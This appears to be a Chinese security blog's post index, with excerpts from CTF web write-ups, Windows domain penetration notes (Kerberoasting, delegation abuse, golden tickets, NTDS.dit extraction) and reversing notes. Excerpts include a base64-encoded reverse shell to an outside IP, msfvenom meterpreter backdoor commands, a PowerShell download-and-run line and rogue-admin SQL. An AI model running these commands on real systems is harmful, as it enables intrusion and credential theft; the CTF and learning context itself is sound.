- 博客(123)
- 收藏
- 关注
RSS订阅原创 看雪CTF web(SSRF+XML+JAR协议)
题外很久没写文章了,这儿再水一篇正文首先打开题目直接有个提示,给了两个链接根据测试第一个链接/getimage?url=https://bbs.pediy.com是远程加载图片的,而且对于url有一定的格式要求那么我们怎么绕过这个正则呢?这儿就需要用到一个技巧了,这儿是java环境,httpclient3和httpclient4这两个库都有容错机制,即假如端口后面存在其他字符会自动舍弃掉(/作为分隔符)而且都会对host进行url二次解码,所以我们最终的payload为:http:/
2020-12-01 23:18:58
1504
原创 第十三届全国大学生信息安全竞赛(线上初赛)Web
littlegameAn evil dragon took the beautiful princess, let’s take this challenge!题目直接给了源码const Admin = { "password1":process.env.p1, "password2":process.env.p2, "password3":process.env.p3}router.post("/DeveloperControlPanel", function (re
2020-09-19 11:08:50
1714
原创 socket发送http请求时的走私
简述这是在做一道CTF题目时遇到的,这儿稍微记录一下code服务端#!/usr/bin/env python3# i use arch btwfrom flask import Flask, render_template, requestfrom werkzeug.serving import WSGIRequestHandler, BaseWSGIServerimport subprocessimport jsonapp = Flask(__name__)@app.
2020-07-19 08:09:20
493
原创 关于python使用系统命令反弹shell的一点记录
前一段时间遇到了这个问题在此记录一下os.system('bash -c \"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjkuMjA0LjIwNy4xMTQvNDA0MCAwPiYxCg==}|{base64,-d}|{bash,-i}\"')这个payload实际上是java的payload,只是java不需要后面的双引号转换网址但是这个有个限制假如采用了字符串拼接的形式(即大括号有实际意义,字符串前面加个f)这个时候我们去掉大括号即可(大括号的作用是在过滤
2020-07-14 00:00:56
1369
原创 ASIS CTF Quals 2020 web复现
听说这期题目不错,就复现了一下,由难到易Admin Panel源码app.jsconst express = require('express');const app = express();const session = require('express-session');const db = require('better-sqlite3')('./db.db', {readonly: true});const cookieParser = require("cookie-pars
2020-07-09 01:12:51
869
1
原创 域渗透——基于资源的约束委派利用
环境域: test.com域控:Windows server 2012R2, 主机名: AD, IP: 192.168.1.7委派的域内主机:系统:win2008R2,主机名:win2008,ip:192.168.1.24域内普通用户: test,对win2008有写的权限域内普通用户: test1攻击机器:系统:win2019 ip:192.168.1.19 登录用户为test1设置test的写权限验证test这个用户对win2008是否具有写权限,可以使用PowerView枚举w
2020-07-03 01:29:10
1790
原创 渗透测试基础知识
反弹shellwindows:生成后门msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.110 lport=4444 -f exe > test.exemsf等待连接use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.1.110 set lport 4444 exp
2020-06-29 00:02:23
1238
原创 2020第五空间 web writeup
hate-php源码 <?phperror_reporting(0);if(!isset($_GET['code'])){ highlight_file(__FILE__);}else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');
2020-06-27 00:16:35
3251
原创 发现域中的委派主机或账户
PowerViewPowerview有两个版本一个在dev分支:https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1一个在master分支:https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1dev分支能够使用Get-DomainUser查询域中约束委派的计算机和用户而master分支目前我还不知道怎
2020-06-21 23:45:51
608
原创 python中关于pyinstaller的问题一些总结
1、安装虚拟环境+常用命令我们都知道,如果直接在复杂的环境使用pyinstaller会使得打包出来的文件十分大pip install virtualenvpip install virtualenvwrapper-win指定虚拟环境的python解释器 : virtualenv -p 解释器路径创建虚拟环境: mkvirtualenv 虚拟环境名查看所有虚拟环境 lsvirtualenv进入虚拟环境 workon 虚拟环境名退出虚拟环境 deactivate删除虚拟
2020-06-21 23:22:58
828
原创 约束委派+利用约束委派生成黄金票据
环境域: test.com域控:Windows server 2012R2, 主机名: AD, IP: 192.168.1.7域内主机:系统:windows 2012R2,主机名:HyyMbb,ip:192.168.1.22被委派用户test测试用户test1操作步骤我们需要提前知道的信息被委派用户的明文密码或者ntml密码:123!@#qwentml:e5ae562ddfaa6b446c32764ab1ebf3ed1、已经知道服务用户明文的条件下,我们可以用kekeo请求该用户
2020-06-21 23:11:21
1606
原创 CTF 关于linux 7z解压的一点trick
示例假如我们可以任意文件上传,但是后缀拼接了一个hash256(要求是上传一个7z压缩文件,因为题目对应的功能是解压后缀为7z的文件)1、这个时候我们可以在文件名后面加一个/2、此时我们的结构为filename.zip/hash2563、虽然filename.zip是一个目录,而上传的内容在hash256文件中,但是Linux的特性支持直接解压一个文件夹,只要文件夹里面含有7z的压缩文件(即有一个7z文件格式的文件)总结类似的trick还有php可以执行打包文件,详情见链接...
2020-06-19 01:08:27
1095
原创 RCTF2020关于反序列化的一些记录
这次比赛,我只能说这就是RCTF? i了i了~~这次有一道web题目,是关于反序列化的,这儿稍微记录一下其中的知识点~题目源码<?phpSwoole\Runtime::enableCoroutine($flags = SWOOLE_HOOK_ALL);$http = new Swoole\Http\Server("0.0.0.0", 9501);$http->on("request", function (Swoole\Http\Request $request, Swool
2020-06-07 22:36:14
668
原创 As-repoasting爆破
这个功能会通过LDAP查询域内用户设置了选项”Do not require Kerberos preauthentication”,然后发AS_REQ的包,直接生成hash或者john可破解的格式我们先设置一个用户不需要预验证然后直接使用Rubeus来寻找可以利用的用户~~执行的命令为:Rubeus.exe asreproast这样我们直接用hashcat爆破密码就行了这儿默认返回的是hash格式的,若想要返回john格式的执行命令Rubeus.exe asreproast /for
2020-06-03 20:45:12
315
原创 非约束委派+Spooler打印机服务 制作黄金票据
环境域: test.com域控:Windows server 2012R2, 主机名: AD, IP: 192.168.1.7域内主机:系统:windows 2008R2,主机名:WIN2008,ip:192.168.1.8原理:利用非约束委派+Spooler打印机服务可以强制指定的主机进行连接我们给win2008R2这个主机账户开启非约束委派复现1、首先我们需要一个win2008R2的管理账号我直接用本地的管理员账号打开一个cmd直接运行命令Rubeus.exe m
2020-06-03 00:41:38
2360
原创 从NTDS.dit获取密码hash
获取NTDS.dit加载ps脚本IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.5/Invoke-NinjaCopy.ps1");提取本地sam文件Invoke-NinjaCopy -Path C:\Windows\System32\config\sam -LocalDestination C:\Users\Administrator\Desktop\sam提取域控NTDS.ditInvoke-NinjaCopy
2020-05-31 10:06:37
369
原创 域渗透-kerberoast Attack
攻击简介过程:查询SPN,找到有价值的SPN,需要满足以下条件: 1、该SPN注册在域用户帐户(Users)下 2、域用户账户的权限很高 3、请求TGS 4、导出TGS 5、暴力破解SETSPNsetspn -A HOST/AD.test.com test #给账号申请SPN机器:AD.test.com 帐号:test 服务:HOST 若有些服务有端口,则可以直接这样写:setspn -A HTTP/AD.test.com:80 testsetspn -
2020-05-31 00:37:05
698
1
原创 mimikatz的基本使用
常见命令cls-----------------------------清屏exit----------------------------退出version------------查看mimikatz的版本system::user-----查看当前登录的系统用户system::computer-------查看计算机名称process::list------------------列出进程process::suspend 进程名称 -----暂停进程process::stop 进程名称--
2020-05-25 20:39:49
9629
原创 第二届网鼎杯(第三场:朱雀组)Think Java
首先题目给了一些class文件,这些不需要多说,直接jd-gui反编译或者使用fernflower反编译也可以解题过程先扫一下目录得到swagger-ui.html发现几个api接口sql注入得到密码源代码中明显存在SQL注入(dbName可控),但是必须满足两个条件,否则不能连接数据库#号在引号里面时当做填充符,没有实际意义(这个只是在jdbc中这样?还没来得及验证)最终:jdbc:mysql://mysqldbserver:3306/myapp#‘ union select
2020-05-20 00:03:09
1671
1
转载 GPP漏洞利用(转载)
总结与反思:GPP中管理员给域成员添加的账号信息存在xml,可以直接破解拿到账号密码。测试环境windows7 普通域成员windows2008 域控首先部署GPP,这里我部署的策略是给域成员都添加一个test用户,密码为test123添加一个本地用户然后来到组策略管理将domain computers 添加到验证组策略对象然后到域成员win7这台机器上执行gpupdate && net user 然后可以访问\\tomato-dc\SYSVOL\tomato.
2020-05-17 10:07:41
1188
原创 joomla渗透测试(脏牛提权)
本来是个域渗透,不过环境有问题,就当作web题在做了解题过程这是一个joomla cms我们先扫一下目录连接mysql得到MySQL的账号和密码然后创建新的管理员 INSERT INTO `am2zu_users` (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`) VALUES ('Administrator2', 'admin2','d2064
2020-05-15 06:41:52
992
原创 第二届网鼎杯(第一场:青龙组)web WriteUp
学校战队总排名52,web和pwn各拿了一个一血,只能说师傅太强了,不过后来的排名有点起飞,最后半小时,直接从前十名飞出去了~~filejava这道题主要考察的是java的xxe漏洞,这个题目总共有两个功能,上传和下载功能,有上传和下载,我们就想到两个漏洞点,是否有任意文件上传或者任意文件下载?经过测试确实有任意文件下载,但是任意文件上传确不存在,但是却能够为我们提供路径~~任意文件下载但是我们不知道web的路径怎么办?我们还有文件上传的报错~~文件上传我们可以看到报错处直接给了web的
2020-05-11 13:40:17
1829
原创 Apache启动失败DefaultRuntimeDir must be a valid directory, absolute or relative to ServerRoot
网上有很多回答,但是都没有说到最后一步source /etc/apache2/envvarssudo service apache2 restart两个步骤缺一不可
2020-05-05 18:37:30
3805
1
原创 python2 中文无法解码的问题
req = requests.post(url,data=data)req.encoding = 'gbk'print(req.text.encode('gbk').decode(req.apparent_encoding))
2020-05-02 14:41:54
371
原创 HFCTF2020 web writeup
easy_loginjust_escape进入这个页面然后显示的是一个php的任意代码执行的页面,但是经过测试,这个根本就是php,其实题目也有提示我们输入Error().stack可以根据回显得到,这是一个JS的vm2,而且经过测试许多关键字都被过滤所以我们使用字符串拼接就可以了~~然后我们去网上找一下关于vm2的payload所以最终的payload为:(function (...
2020-04-21 12:41:43
3043
原创 MRCTF 逆向题目简要分析
Transform很简单的逻辑分析payload:dword_40F040 = [0x09,0x0A,0x0F,0x17,0x07,0x18,0x0C,0x06,0x01,0x10,0x03,0x11,0x20,0x1D,0x0B,0x1E,0x1B,0x16,0x04,0x0D,0x13,0x14,0x15,0x02,0x19,0x05,0x1F,0x08,0x12,0x1A,0x1C,...
2020-04-17 19:02:06
552
原创 临时文件上传无字母数字RCE
题目分析<?phpif(isset($_GET['cmd'])){ $cmd=$_GET['cmd']; highlight_file(__FILE__); if(preg_match("/[A-Za-oq-z0-9$]+/",$cmd)){ die("cerror"); } if(preg_match("/\~|\!|\@|\#|...
2020-04-12 13:40:06
1690
原创 第一次攻防世界逆向小记录(纯re小白)
insanity拖进IDA直接F5查看见源代码shift+F12查看main函数的字符串得到flagpython-trade一道python逆向题我们下载附件得到pyc文件(pyc文件就是 py程序编译后得到的字节码文件)安装uncompyle6uncompyle6 test.pyc > test.py得到py文件一个简答的加密函数,编写解密函数即可得到flag~op...
2020-04-04 17:00:19
749
原创 逆向入门之壳内寻早注册码
简介就是在应用加壳的情况下,能够精确定位字符串,并且定位关键函数地址实战这儿需要我们填写注册码我们随便填写载入Ollydbg运行程序CTRL+g 输入401000,跳转到这个地址这个时候就可以查找关键字了(查找)找到关键点,下断点然后关闭软件,重新加载函数出现这个提示,是因为重新加载函数后,还没脱壳,所以断点不能被加载,这个时候不用管ta寻...
2020-04-03 21:34:05
309
原创 #对于星球一道题目的思考
题目介绍$filename=$_POST["filename"];file_put_contents($filename, '<?php exit();'.$filename);问如何getshell思路一:php://filter/convert.base64-encode|base64编码/resource=a.php这个思路不行,因为这个是同一个变量在php中,如...
2020-04-03 15:58:20
210
原创 逆向入门之使用ESP定律脱壳
使用ESP定律脱壳实战查壳载入OD首先F8在这么多寄存器中,只有ESP是红色的,则可以使用ESP定律来脱壳选择好ESP地址,然后右键,在数据窗口中跟随这个时候就来到了ESP指定的地址然后选择几个数据(多少无所谓)最右边三个选项随便选,都无所谓然后点击运行,这个时候程序就会停在我们设置好的硬件断点上然后删除硬件断点然后一直F8 知道出现这个页面然后右键...
2020-04-03 12:58:24
1309
原创 CTF 第一次接触智能合约(主要描述一下操作流程)
合约地址0x421DbB4ca0Fdb1872e5780BD95743085357CD7B8源代码pragma solidity ^0.4.23;contract Trans{ string flag; mapping(address => uint256) balances; constructor () public { fla...
2020-03-31 22:02:28
2851
原创 MRCTF2020 web Ezpop_Revenge 简单记录
题目介绍首先这是一个typecho的框架然后通过扫目录得到www.zip源码泄露,然后就是审计代码了~~解题过程首先我们找到输入点在插件中,我们发现action()的代码这儿需要说明一下,这儿的action一般是自动加载的,当路由加载类是会自动加载某个函数,所以我们直接搜索这个类得名称~~Helper::addRoute("page_admin_action","/page_a...
2020-03-31 10:20:30
2983
原创 高校战“疫”网络安全分享赛 —— Write-up
Guessgame这道题目当时没做出来,后来复现的时候,发现挺有意思的,题目中主要有三个考点JS的大小写特征原型链污染redos盲注这儿主要着重介绍一下第三个考点JS的 exec test RegExp match replace spite可以造成redos盲注/([a-z]+)+$/.exec('aaaaaaaaaaaaaaaaaaaaaaaaaaaa!');/Runoo...
2020-03-30 14:49:24
2166
原创 python反序列化的一些技巧
写入全局变量有这么一道题,彻底过滤了R指令码(写法是:只要见到payload里面有R这个字符,就直接驳回,简单粗暴)。现在的任务是:给出一个字符串,反序列化之后,name和grade需要与blue这个module里面的name、grade相对应。import pickleimport pickletoolsimport base64payload_before = b"\x80\x03c...
2020-03-29 16:20:56
727
转载 三道python反序列化题目介绍
参考链接从Balsn CTF pyshv学习python反序列化源码以及wp:https://github.com/sasdf/ctf/tree/master/tasks/2019/BalsnCTF/miscpython反序列化和其他语言的序列化一样,Python 的序列化的目的也是为了保存、传递和恢复对象的方便性,在众多传递对象的方式中,序列化和反序列化可以说是最简单和最容易实现的方式。...
2020-03-29 13:29:55
689
原创 python反序列化的一些介绍
基础介绍c:引入模块和对象,模块名和对象名以换行符分割。(find_class校验就在这一步,也就是说,只要c这个OPCODE的参数没有被find_class限制,其他地方获取的对象就不会被沙盒影响了,这也是我为什么要用getattr来获取对象)(:压入一个标志到栈中,表示元组的开始位置t:从栈顶开始,找到最上面的一个(,并将(到t中间的内容全部弹出,组成一个元组,再把这个元组压入栈中R:...
2020-03-28 00:55:20
174
原创 2020 易博霖 CTF web
RCE_NOPAR无字符GETSHELL就行payload:eval(hex2bin(session_id(session_start())))改PHPSSEION值为16进制就行SSRF把file后面的参数两层base64解开,就知道可以包含其他文件,两层base64编码就行第一层读index.php<?phperror_reporting(E_ALL || ~E_NOT...
2020-03-27 18:08:10
635
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人